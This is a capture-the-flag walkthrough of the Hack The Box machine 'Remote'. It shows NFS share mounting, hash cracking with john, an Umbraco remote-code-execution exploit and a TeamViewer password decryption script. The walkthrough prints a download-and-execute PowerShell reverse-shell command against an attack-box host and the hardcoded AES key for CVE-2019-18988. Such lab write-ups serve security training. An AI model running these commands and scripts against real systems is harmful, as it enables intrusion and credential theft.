REMOTE HTB WRITE UP | WALKTHROUGH

Published in

System Weakness

6 min readFeb 5, 2024

Remote is a good HTB machine to learn about the danger of public sharing of files on a network and use of not upgrade software. Inside this article, I will show you methods I use to pwned this machine.

RECONNAISSANCE

Before start, we have to know some information about the VICTIM machine and one of the best way to do it is a nmap scan

nmap -sC -sV -O TARGET_IP

There is the output of scan

Many ports are open, firstly we can mark the port 21 that allows anonymous login and the port 80 that mean there is a website open on the target machine

FTP ANONYMOUS LOGIN

Anonymous login mean that we can log into the ftp server by using the anonymous username without password.

Now connected, use “ls” to list all files available on the server

Nothing, what a deception 😓. But don’t give up and try another thing

MOUNTD SHARED FILES

Look at the last open port, the 2049 port running the mountd service, meaning that there is shared files by the TARGET machine, and we can mount it in our local machine.
Firstly, we use the following command

showmount -e TARGET_IP

Showmount help used to list all the directory shared by the victim that everyone in the network can mount in this local machine.

As you seen in the previous output, there is a /site_backups folder we can mount with the following command

sudo mount -t nfs TARGET_IP:/site_backups victim

The shared folder will be mount inside the victim folder I created.

It looks to be a folder for the CMS use by the site hosted in the target computer (remind port 80) is open.

I have done little research on the internet and found that the Umbraco CMS store credentials in a file name Umbrco.sdf inside the App_Data directory.

Open it with any editor you want(I use nano).

We can see (underlined) username hash of password and hash algorithm used. We will use john the ripper to decrypt the password with this command

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash.txt

hash.txt is the file inside which I paste the hash of password. After this, you can use the following command to show password cracked

john --show hash.txt

Now we have credentials, we have to find a way to access admin panel via this link http://TARGET_IP/umbraco

Once connected, we can go to help panel to see Umbraco version

We use searchploit command to find vulnerability existed for this version

Exploit can be use like this

python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u username -p password -i 'http://TARGET_IP' -c 'command'

As you seen with the screenshot below, we can use it we information we gather to execute whoami command

The next step is to use this vulnerability to get access

Windows reverse shell

Usually, to do a reverse shell between two machines, we use netcat utility that is not installed by default on Windows. So we will use a PowerShell script that connect back Windows shell to our attack box.
So we downloaded it first in our attack box with wget command

wget https://github.com/martinsohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1

Update the script with attack box IP address and the port that will be use in netcat listener

Open a simple HTTP server, we will download the script on victim machine from the attack box

Run a netcat listener because the command will download the powershell script and execute it once :

nc -lvnp PORT

The following command download and execute the powershell script that connect back to our netcat listener.

python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u admin@htb.local -p baconandcheese -i 'http://TARGET_IP' -c powershell.exe -a 'IEX(IWR http://ATTACK_BOX_IP:8000/powershell-reverse-shell.ps1 -UseBasicParsing); powershell-reverse-shell ATTACK_BOX_IP PORT'

Come back to our netcat listener and we are connected

Once connected you can easily get the flag

Privilege escalation

We are connected as a simple user, but we can use our access to get more privileges.
Take the at the files insides the C:\Users\Public\Desktop

There is a link to the software TeamViewer version 7. To verify that, we check at a non default running service that is launch by TeamViewer with this command

tasklist /svc

As you seen in the output, TeamViewer7 is running

I just search for “TeamViewer vulnerability”. And I found this : https://www.cvedetails.com/cve/CVE-2019-18988/. The previous vulnerability can be used to decrypt password and get password in the login system like administrator password.

A little brief about the vulnerability : The version of TeamViewer from 7 to 14.8 store password in a registry key encrypted with AES, but all the software have a same key. If you have a key, you can easily decrypt an admin password on a local machine.

Manual exploit

Once connect, we can print the value of registry Key with this command

reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7

As you seen in output, the password to acces remotely to machine encrypted with AES

We will use this little python code from this site : https://web.archive.org/web/20200203175441/https://whynotsecurity.com/blog/teamviewer/, to decrypt the password.

import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "PASTE THE CIPHER PASSWORD HERE"   # output from the registry

ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)

print(hexdump.hexdump(raw_un))

password = raw_un.decode('utf-16')
print(password)